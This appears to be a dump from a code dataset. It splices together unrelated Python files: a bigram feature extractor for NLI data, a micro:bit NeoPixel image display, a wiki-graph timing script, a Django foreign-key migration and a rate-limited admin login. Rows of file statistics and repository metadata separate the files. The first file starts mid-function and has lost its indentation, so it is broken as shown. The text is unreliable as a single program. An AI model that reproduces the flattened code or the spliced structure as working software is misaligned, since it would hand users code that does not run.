bigrams += unigrams
bigrams = set(bigrams)
unigrams_premise = row["premise"].split(" ")[:-1]
bigrams_premise = [b for b in zip(row["premise"].split(" ")[:-1], row["premise"].split(" ")[1:])]
bigrams_premise += unigrams_premise
bigrams_premise = set(bigrams_premise)
bigrams_union = list(bigrams.union(bigrams_premise))
for b in bigrams_union:
key = " ".join(b)
if key not in bigram_to_index.keys():
bigram_to_index[key] = len(index_to_bigram)
index_to_bigram.append(key)
if (index+1)%1000 == 0:
print("{} examples finshed".format(index+1))
for index,row in alpha3_data.iterrows():
#label = int(row["label"])
if row["hypothesis"][-1] == '.':
row["hypothesis"] = row["hypothesis"][:-1]
unigrams = row["hypothesis"].split(" ")[:-1]
bigrams = [b for b in zip(row["hypothesis"].split(" ")[:-1], row["hypothesis"].split(" ")[1:])]
bigrams += unigrams
bigrams = set(bigrams)
try:
unigrams_premise = row["premise"].split(" ")[:-1]
bigrams_premise = [b for b in zip(row["premise"].split(" ")[:-1], row["premise"].split(" ")[1:])]
bigrams_premise += unigrams_premise
bigrams_premise = set(bigrams_premise)
except:
bigrams_premise = bigrams
bigrams_union = list(bigrams.union(bigrams_premise))
for b in bigrams_union:
key = " ".join(b)
if key not in bigram_to_index.keys():
bigram_to_index[key] = len(index_to_bigram)
index_to_bigram.append(key)
if (index+1)%1000 == 0:
print("{} examples finshed".format(index+1))
return bigram_to_index, index_to_bigram
def get_data(data, bigram_to_index):
trainable_data = np.zeros((1,len(bigram_to_index)))
labels = np.array([])
for index,row in data.iterrows():
labels = np.append(labels,int(row["label"]))
data_point = np.zeros((1,len(bigram_to_index)))
if row["hypothesis"][-1] == '.':
row["hypothesis"] = row["hypothesis"][:-1]
unigrams = row["hypothesis"].split(" ")[:-1]
bigrams = [b for b in zip(row["hypothesis"].split(" ")[:-1], row["hypothesis"].split(" ")[1:])]
bigrams += unigrams
for b in bigrams:
key = " ".join(b)
data_point[0][bigram_to_index[key]] = 1
trainable_data = np.append(trainable_data,data_point,axis=0)
if (index+1)%1000 == 0:
print("{} examples finshed".format(index))
trainable_data = trainable_data[1:]
return trainable_data, labels
def get_data_svm_format(data, bigram_to_index):
trainable_data = ""
for index,row in data.iterrows():
data_point = str(int(row["label"])+1) + " "
try:
if row["hypothesis"][-1] == '.':
row["hypothesis"] = row["hypothesis"][:-1]
except:
print(index)
print(row["hypothesis"])
continue
unigrams = row["hypothesis"].split(" ")[:-1]
bigrams = [b for b in zip(row["hypothesis"].split(" ")[:-1], row["hypothesis"].split(" ")[1:])]
bigrams += unigrams
bigrams = set(bigrams)
try:
unigrams_premise = row["premise"].split(" ")[:-1]
bigrams_premise = [b for b in zip(row["premise"].split(" ")[:-1], row["premise"].split(" ")[1:])]
bigrams_premise += unigrams_premise
bigrams_premise = set(bigrams_premise)
except:
bigrams_premise = bigrams
bigrams_union = list(bigrams.union(bigrams_premise))
bigram_active = []
for b in bigrams_union:
key = " ".join(b)
bigram_active += [int(bigram_to_index[key])+1]
bigram_active = list(set(bigram_active))
bigram_active.sort()
for b in bigram_active[:-1]:
data_point += str(b) + ":" + "1" + " "
try:
trainable_data += data_point + str(bigram_active[-1]+1) +":"+"1"+"\n"
except:
pass
if (index+1)%1000 == 0:
print("{} examples finshed".format(index))
return trainable_data
if __name__ == "__main__":
train_data = pd.read_csv(data_dir+"train.tsv",sep="\t",encoding="ISO-8859-1")
dev_data = pd.read_csv(data_dir+"dev.tsv",sep="\t",encoding="ISO-8859-1")
test_data = pd.read_csv(data_dir+"test_alpha1.tsv",sep="\t",encoding="ISO-8859-1")
test_adverse_data = pd.read_csv(data_dir+"test_alpha2.tsv",sep="\t",encoding="ISO-8859-1")
alpha3_data = pd.read_csv(data_dir+"test_alpha3.tsv",sep="\t",encoding="ISO-8859-1")
bigram_to_index, index_to_bigram = get_dimensions(train_data,dev_data,test_data,test_adverse_data, alpha3_data)
print("Got_dimensions")
#np.save("lookup.npy",np.array(index_to_bigram))
train_data_final = get_data_svm_format(train_data,bigram_to_index)
fp = open(save_dir+"train.txt","w+")
fp.write(train_data_final)
dev_data_final = get_data_svm_format(dev_data,bigram_to_index)
fp = open(save_dir+"dev.txt","w+")
fp.write(dev_data_final)
test_data_final = get_data_svm_format(test_data,bigram_to_index)
fp = open(save_dir+"test_alpha1.txt","w+")
fp.write(test_data_final)
test_data_adverse_final = get_data_svm_format(test_adverse_data,bigram_to_index)
fp = open(save_dir+"test_alpha2.txt","w+")
fp.write(test_data_adverse_final)
alpha3_data_final = get_data_svm_format(alpha3_data,bigram_to_index)
fp = open(save_dir+"test_alpha3.txt","w+")
fp.write(alpha3_data_final)
| 35.083682 | 112 | 0.667621 | 1,211 | 8,385 | 4.406276 | 0.076796 | 0.107196 | 0.063343 | 0.074775 | 0.842204 | 0.834708 | 0.755435 | 0.720015 | 0.693778 | 0.674663 | 0 | 0.020996 | 0.142278 | 8,385 | 238 | 113 | 35.231092 | 0.72094 | 0.020513 | 0 | 0.706468 | 0 | 0 | 0.126965 | 0.007067 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014925 | false | 0.004975 | 0.014925 | 0 | 0.044776 | 0.059701 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d74d0bc09031e156dbc8ea122883f338e9bbe127 | 34 | py | Python | holobot/sdk/threading/__init__.py | rexor12/holobot | 89b7b416403d13ccfeee117ef942426b08d3651d | [
"MIT"
] | 1 | 2021-05-24T00:17:46.000Z | 2021-05-24T00:17:46.000Z | holobot/sdk/threading/__init__.py | rexor12/holobot | 89b7b416403d13ccfeee117ef942426b08d3651d | [
"MIT"
] | 41 | 2021-03-24T22:50:09.000Z | 2021-12-17T12:15:13.000Z | holobot/sdk/threading/__init__.py | rexor12/holobot | 89b7b416403d13ccfeee117ef942426b08d3651d | [
"MIT"
] | null | null | null | from .async_loop import AsyncLoop
| 17 | 33 | 0.852941 | 5 | 34 | 5.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d766024bcf9d95022814fed3e5ee6c06f654f0d9 | 3,785 | py | Python | neopixel/neo_16x16_img/neo16x16_img.py | randmor/microbit-lib | 68bf5a10b52fc56e87f5e4390285a4547eb58120 | [
"MIT"
] | 44 | 2018-01-29T16:27:34.000Z | 2022-03-18T18:11:33.000Z | neopixel/neo_16x16_img/neo16x16_img.py | bsliao0211/microbit-lib | fd767fb44173f317e4640a7af08afdb065770d91 | [
"MIT"
] | 8 | 2018-09-03T15:12:54.000Z | 2022-03-08T13:30:16.000Z | neopixel/neo_16x16_img/neo16x16_img.py | bsliao0211/microbit-lib | fd767fb44173f317e4640a7af08afdb065770d91 | [
"MIT"
] | 36 | 2018-02-07T03:35:24.000Z | 2022-03-15T15:21:19.000Z | from microbit import *
from neopixel import NeoPixel
class neo16x16_img:
def __init__(self,pin):
self.np=NeoPixel(pin,256)
def clear(self):
self.np.clear()
def show(self,dat,pos=0):
for x in range(16):
for y in range(8):
if ((x+pos)*8)>=len(dat):
self.np[x*16+y*2]=(0,0,0)
self.np[x*16+y*2+1]=(0,0,0)
else:
t=dat[(x+pos)*8+y]
r=t%16
g=(t>>4)%16
b=(t>>8)%16
if pos%2:
self.np[x*16+y*2]=(r,g,b)
else:
self.np[x*16+15-y*2]=(r,g,b)
r=(t>>12)%16
g=(t>>16)%16
b=(t>>20)%16
if pos%2:
self.np[x*16+y*2+1]=(r,g,b)
else:
self.np[x*16+14-y*2]=(r,g,b)
self.np.show()
def _delay(t):
while t>0:
t=t-1
npdat=[
0x000000, 0x000000, 0x000000, 0x000000,
0x121145, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x169156,
0x000000, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x234000,
0x15818B, 0x000217, 0x000000, 0x000000,
0x000000, 0x000000, 0x129000, 0x0AE17B,
0x000169, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x19C301,
0x24709C, 0x00013A, 0x000000, 0x000000,
0x000000, 0x000000, 0x116000, 0x169237,
0x24718B, 0x245169, 0x000000, 0x000000,
0x000000, 0x235000, 0x0CF09D, 0x1590AE,
0x159159, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x17C149,
0x09D18C, 0x0BF0BE, 0x23519C, 0x000234,
0x000000, 0x17B000, 0x16B15C, 0x14817C,
0x000024, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x002013,
0x012000, 0x11A126, 0x000116, 0x000000,
0x000000, 0x000000, 0x000000, 0x048012,
0x16B149, 0x12716A, 0x000000, 0x000000,
0x000000, 0x12811B, 0x147247, 0x09E16A,
0x15B09D, 0x00010A, 0x000000, 0x000000,
0x000000, 0x000000, 0x16C127, 0x0BE08D,
0x17A0BF, 0x18B09C, 0x13A17A, 0x000227,
0x214000, 0x0AE17A, 0x1680AE, 0x0AD235,
0x0BE0BF, 0x00009C, 0x000000, 0x000000,
0x000000, 0x000000, 0x236235, 0x158246,
0x000245, 0x246312, 0x18B168, 0x200145,
0x122000, 0x000123, 0x000000, 0x000000,
0x000000, 0x235000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0xEEE000, 0xFC9FC9,
0xFC9FC9, 0x000000, 0x000000, 0x000000,
0x000000, 0x000000, 0xFC9000, 0xFC9FC9,
0xFC9FC9, 0xEEEFC9, 0x000000, 0x000000,
0x000000, 0xAAA000, 0x555FC9, 0x000000,
0x333000, 0xEEEFC9, 0x000000, 0x000000,
0x000000, 0x000000, 0xFC9FC9, 0x000000,
0x000F90, 0xFC9000, 0x000FC9, 0x000000,
0x000000, 0xFC9000, 0x000FC9, 0xF99000,
0x000000, 0xFC9FC9, 0x000000, 0x000000,
0x000000, 0x000000, 0xFC9FC9, 0x000000,
0x000000, 0xFC9000, 0x000FC9, 0x000000,
0x000000, 0xFC9000, 0x000FC9, 0x000000,
0x000000, 0xFC9FC9, 0x000000, 0x000000,
0x000000, 0x000000, 0xFC9FC9, 0x000000,
0x000000, 0xFC9000, 0x000FC9, 0x000000,
0x000000, 0xFC9000, 0x000FC9, 0x000000,
0x000000, 0xFC9FC9, 0x000000, 0x000000,
0x000000, 0x000000, 0xFC9FC9, 0x000000,
0x000000, 0xFC9000, 0x000FC9, 0x000000,
0x000000, 0xFC9000, 0x000FC9, 0xF99000,
0x000000, 0xFC9FC9, 0x000000, 0x000000,
0x000000, 0x000000, 0xFC9FC9, 0x000000,
0x000F90, 0xFC9000, 0x000FC9, 0x000000,
0x000000, 0xBBB000, 0x333FC9, 0x000000,
0x111000, 0xEEEFC9, 0x000000, 0x000000,
0x000000, 0x000000, 0xFC9000, 0xFC9FC9,
0xFC9FC9, 0xFC9FC9, 0x000000, 0x000000,
0x000000, 0x000000, 0xFC9000, 0xFC9FC9,
0xFC9FC9, 0x000000, 0x000000, 0x000000,
]
ne = neo16x16_img(pin1)
n = 0
while True:
ne.show(npdat, n)
n = (n+16)%32
_delay(15000)
| 33.794643 | 52 | 0.653897 | 430 | 3,785 | 5.737209 | 0.283721 | 0.648561 | 0.632347 | 0.518849 | 0.522092 | 0.501824 | 0.406567 | 0.310499 | 0.297527 | 0.297527 | 0 | 0.572114 | 0.228798 | 3,785 | 111 | 53 | 34.099099 | 0.273039 | 0 | 0 | 0.304762 | 0 | 0 | 0 | 0 | 0 | 0 | 0.541083 | 0 | 0 | 1 | 0.038095 | false | 0 | 0.019048 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d7664d6606be6452da89bc1bbf9ddda941f6b4d5 | 1,048 | py | Python | back/tests/runtimes.py | ubbonolte/linkmaps | 0f077f1d99ea3d1ea8cf672569a80899e1210203 | [
"MIT"
] | null | null | null | back/tests/runtimes.py | ubbonolte/linkmaps | 0f077f1d99ea3d1ea8cf672569a80899e1210203 | [
"MIT"
] | null | null | null | back/tests/runtimes.py | ubbonolte/linkmaps | 0f077f1d99ea3d1ea8cf672569a80899e1210203 | [
"MIT"
] | null | null | null | from graph_service import WikiGraphGenerator
import timeit
def run_wiki_generator():
generator = WikiGraphGenerator()
start = timeit.default_timer()
graph = generator.generate('Cook_(domestic_worker)', depth=1)
stop = timeit.default_timer()
print ("Cook_(domestic_worker), Depth == 1: Runtime = ", stop - start, "s, Graph = ", graph)
start = timeit.default_timer()
graph = generator.generate('Cook_(domestic_worker)', depth=2)
stop = timeit.default_timer()
print ("Cook_(domestic_worker), Depth == 2: Runtime = ", stop - start, "s, Graph = ", graph)
start = timeit.default_timer()
graph = generator.generate('Albert Einstein', depth=1)
stop = timeit.default_timer()
print ("Albert Einstein, Depth == 1: Runtime = ", stop - start, "s, Graph = ", graph)
start = timeit.default_timer()
graph = generator.generate('Albert Einstein', depth=2)
stop = timeit.default_timer()
print ("Albert Einstein, Depth == 2: Runtime = ", stop - start, "s, Graph = ", graph)
run_wiki_generator() | 38.814815 | 96 | 0.674618 | 124 | 1,048 | 5.532258 | 0.209677 | 0.151604 | 0.209913 | 0.134111 | 0.833819 | 0.833819 | 0.833819 | 0.827988 | 0.658892 | 0.520408 | 0 | 0.009357 | 0.18416 | 1,048 | 27 | 97 | 38.814815 | 0.792982 | 0 | 0 | 0.380952 | 1 | 0 | 0.274547 | 0.085796 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.095238 | 0 | 0.142857 | 0.190476 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d76af9d7c3fc144ed9a656741c2bc080bc06aa0d | 47 | py | Python | prigen/__init__.py | VladimirShitov/prigen | 9d24abd83868c418f14201b72736dc0a68e98b94 | [
"MIT"
] | null | null | null | prigen/__init__.py | VladimirShitov/prigen | 9d24abd83868c418f14201b72736dc0a68e98b94 | [
"MIT"
] | 1 | 2021-03-11T12:45:59.000Z | 2021-03-11T12:45:59.000Z | prigen/__init__.py | VladimirShitov/prigen | 9d24abd83868c418f14201b72736dc0a68e98b94 | [
"MIT"
] | null | null | null | from prigen.generators import PrimersGenerator
| 23.5 | 46 | 0.893617 | 5 | 47 | 8.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 47 | 1 | 47 | 47 | 0.976744 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d77dd87111e0c6f01c351723b456afa8a3053955 | 747 | py | Python | src/easymql/actions.py | vivek-shrikhande/easy-mql | 8cbf6a77aed8230bd92cee5585227ea4a09001b8 | [
"MIT"
] | null | null | null | src/easymql/actions.py | vivek-shrikhande/easy-mql | 8cbf6a77aed8230bd92cee5585227ea4a09001b8 | [
"MIT"
] | null | null | null | src/easymql/actions.py | vivek-shrikhande/easy-mql | 8cbf6a77aed8230bd92cee5585227ea4a09001b8 | [
"MIT"
] | null | null | null | class Action:
@staticmethod
def action(tokens):
return tokens
class ExpressionAction(Action):
@staticmethod
def action(tokens):
return {
'$'
+ ''.join(
[
part.capitalize() if i else part
for i, part in enumerate(tokens[0].lower().split('_'))
]
): tokens[1:]
}
class UnaryExpressionAction(Action):
@staticmethod
def action(tokens):
return {
'$'
+ ''.join(
[
part.capitalize() if i else part
for i, part in enumerate(tokens[0].lower().split('_'))
]
): tokens[-1]
}
| 22.636364 | 74 | 0.429719 | 60 | 747 | 5.316667 | 0.35 | 0.169279 | 0.197492 | 0.253919 | 0.818182 | 0.818182 | 0.695925 | 0.695925 | 0.695925 | 0.695925 | 0 | 0.009852 | 0.456493 | 747 | 32 | 75 | 23.34375 | 0.775862 | 0 | 0 | 0.571429 | 0 | 0 | 0.005355 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107143 | false | 0 | 0 | 0.107143 | 0.321429 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 6 |
ad0b9f8196ade5887ad082d8c2d90ad7476944ff | 73 | py | Python | ml_deeco/estimators/__init__.py | smartarch/ML-DEECo | f77aa8ffef6a971880dc3ec01f1bd2c03963f9a8 | [
"MIT"
] | null | null | null | ml_deeco/estimators/__init__.py | smartarch/ML-DEECo | f77aa8ffef6a971880dc3ec01f1bd2c03963f9a8 | [
"MIT"
] | null | null | null | ml_deeco/estimators/__init__.py | smartarch/ML-DEECo | f77aa8ffef6a971880dc3ec01f1bd2c03963f9a8 | [
"MIT"
] | null | null | null | from .features import *
from .estimate import *
from .estimator import *
| 18.25 | 24 | 0.753425 | 9 | 73 | 6.111111 | 0.555556 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164384 | 73 | 3 | 25 | 24.333333 | 0.901639 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ad9e663a6b1c76235d7ad34a3ac6d7813a9b6501 | 119 | py | Python | tests/unit/Version.py | Vesuvium/sqlast | 45088dd36de8c76505b2285c1650719b69aafbec | [
"MIT"
] | 4 | 2019-04-05T03:31:46.000Z | 2020-02-27T15:30:07.000Z | tests/unit/Version.py | Vesuvium/sqlast | 45088dd36de8c76505b2285c1650719b69aafbec | [
"MIT"
] | null | null | null | tests/unit/Version.py | Vesuvium/sqlast | 45088dd36de8c76505b2285c1650719b69aafbec | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from sqlast.Version import version
def test_version_version():
assert version == '1.0.0'
| 17 | 34 | 0.663866 | 17 | 119 | 4.529412 | 0.705882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040816 | 0.176471 | 119 | 6 | 35 | 19.833333 | 0.744898 | 0.176471 | 0 | 0 | 0 | 0 | 0.052083 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a8f96d38756176383fe52b3753565b88bd663411 | 62 | py | Python | collinearity/__init__.py | gianlucamalato/collinearity | ad78f1c4344f7c7cd812717080377317af17fcb2 | [
"MIT"
] | 20 | 2021-06-28T16:56:50.000Z | 2021-12-14T18:27:37.000Z | collinearity/__init__.py | gianlucamalato/collinearity | ad78f1c4344f7c7cd812717080377317af17fcb2 | [
"MIT"
] | null | null | null | collinearity/__init__.py | gianlucamalato/collinearity | ad78f1c4344f7c7cd812717080377317af17fcb2 | [
"MIT"
] | 3 | 2021-06-28T17:00:02.000Z | 2021-12-14T18:28:25.000Z | from collinearity.SelectNonCollinear import SelectNonCollinear | 62 | 62 | 0.935484 | 5 | 62 | 11.6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.048387 | 62 | 1 | 62 | 62 | 0.983051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
66fde586f35f9f552d11b6a9786bb92de5be0a08 | 210 | py | Python | dmb/data/transforms/__init__.py | yiranzhong/DenseMatchingBenchmark | a27413126508f4a09f7b5d71512602fde145f09e | [
"MIT"
] | 1 | 2021-01-21T07:13:31.000Z | 2021-01-21T07:13:31.000Z | dmb/data/transforms/__init__.py | yiranzhong/DenseMatchingBenchmark | a27413126508f4a09f7b5d71512602fde145f09e | [
"MIT"
] | null | null | null | dmb/data/transforms/__init__.py | yiranzhong/DenseMatchingBenchmark | a27413126508f4a09f7b5d71512602fde145f09e | [
"MIT"
] | null | null | null | from .transforms import Compose
from .stereo_trans import (
ToTensor, RandomCrop, Normalize, StereoPad, CenterCrop
)
__all__ = ['Compose', 'ToTensor', 'RandomCrop', 'Normalize', 'StereoPad', 'CenterCrop']
| 30 | 87 | 0.738095 | 20 | 210 | 7.5 | 0.6 | 0.24 | 0.36 | 0.48 | 0.613333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128571 | 210 | 6 | 88 | 35 | 0.819672 | 0 | 0 | 0 | 0 | 0 | 0.252381 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
0f502f13290214aff2307efc69ced3e1fb1dc50b | 5,633 | py | Python | core/migrations/0012_auto_20191003_1532.py | nirgal/ngw | 0a28e8f12cb342a20ca3456e2a2ab91dd9c898be | [
"BSD-2-Clause"
] | null | null | null | core/migrations/0012_auto_20191003_1532.py | nirgal/ngw | 0a28e8f12cb342a20ca3456e2a2ab91dd9c898be | [
"BSD-2-Clause"
] | null | null | null | core/migrations/0012_auto_20191003_1532.py | nirgal/ngw | 0a28e8f12cb342a20ca3456e2a2ab91dd9c898be | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.23 on 2019-10-03 15:32
from __future__ import unicode_literals
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ngw', '0011_choicecontactfield_datecontactfield_datetimecontactfield'
'_emailcontactfield_filecontactfield_imagecon'),
]
operations = [
migrations.AlterField(
model_name='choice',
name='choice_group',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name='choices',
to='ngw.ChoiceGroup'),
),
migrations.AlterField(
model_name='contactfield',
name='choice_group',
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
to='ngw.ChoiceGroup',
verbose_name='Choice group'),
),
migrations.AlterField(
model_name='contactfield',
name='choice_group2',
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name='second_choices_set',
to='ngw.ChoiceGroup',
verbose_name='Second choice group'),
),
migrations.AlterField(
model_name='contactfield',
name='contact_group',
field=models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
to='ngw.ContactGroup',
verbose_name='Only for'),
),
migrations.AlterField(
model_name='contactfieldvalue',
name='contact',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name='values',
to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='contactfieldvalue',
name='contact_field',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name='values',
to='ngw.ContactField'),
),
migrations.AlterField(
model_name='contactgroupnews',
name='contact_group',
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name='news_set',
to='ngw.ContactGroup'),
),
migrations.AlterField(
model_name='contactingroup',
name='contact',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='contactingroup',
name='group',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to='ngw.ContactGroup'),
),
migrations.AlterField(
model_name='contactmsg',
name='contact',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
verbose_name='Contact'),
),
migrations.AlterField(
model_name='contactmsg',
name='group',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name='message_set',
to='ngw.ContactGroup'),
),
migrations.AlterField(
model_name='contactmsg',
name='read_by',
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name='msgreader',
to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='groupingroup',
name='father',
field=models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name='direct_gig_subgroups',
to='ngw.ContactGroup'),
),
migrations.AlterField(
model_name='groupingroup',
name='subgroup',
field=models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name='direct_gig_supergroups',
to='ngw.ContactGroup'),
),
migrations.AlterField(
model_name='groupmanagegroup',
name='father',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name='direct_gmg_subgroups',
to='ngw.ContactGroup'),
),
migrations.AlterField(
model_name='groupmanagegroup',
name='subgroup',
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name='direct_gmg_supergroups',
to='ngw.ContactGroup'),
),
migrations.AlterField(
model_name='log',
name='contact',
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to=settings.AUTH_USER_MODEL),
),
]
| 34.987578 | 79 | 0.539499 | 485 | 5,633 | 6.080412 | 0.175258 | 0.051543 | 0.085453 | 0.134283 | 0.81214 | 0.783995 | 0.743642 | 0.724313 | 0.597152 | 0.46253 | 0 | 0.00638 | 0.360021 | 5,633 | 160 | 80 | 35.20625 | 0.81165 | 0.012249 | 0 | 0.771242 | 1 | 0 | 0.15285 | 0.026794 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.026144 | 0 | 0.045752 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0f6e669980fedaac04a91892252e1057000652b3 | 228 | py | Python | fish/account/views.py | JoyBoyMaLin/no-fish | 5f8048fbc334af6d149dd86a5b8b14ad4afba0cb | [
"MIT"
] | null | null | null | fish/account/views.py | JoyBoyMaLin/no-fish | 5f8048fbc334af6d149dd86a5b8b14ad4afba0cb | [
"MIT"
] | null | null | null | fish/account/views.py | JoyBoyMaLin/no-fish | 5f8048fbc334af6d149dd86a5b8b14ad4afba0cb | [
"MIT"
] | null | null | null | from django.contrib import admin
from ratelimit.decorators import ratelimit
@ratelimit(key='ip', rate='5/h', block=True)
def extend_admin_login(request, extra_context=None):
return admin.site.login(request, extra_context)
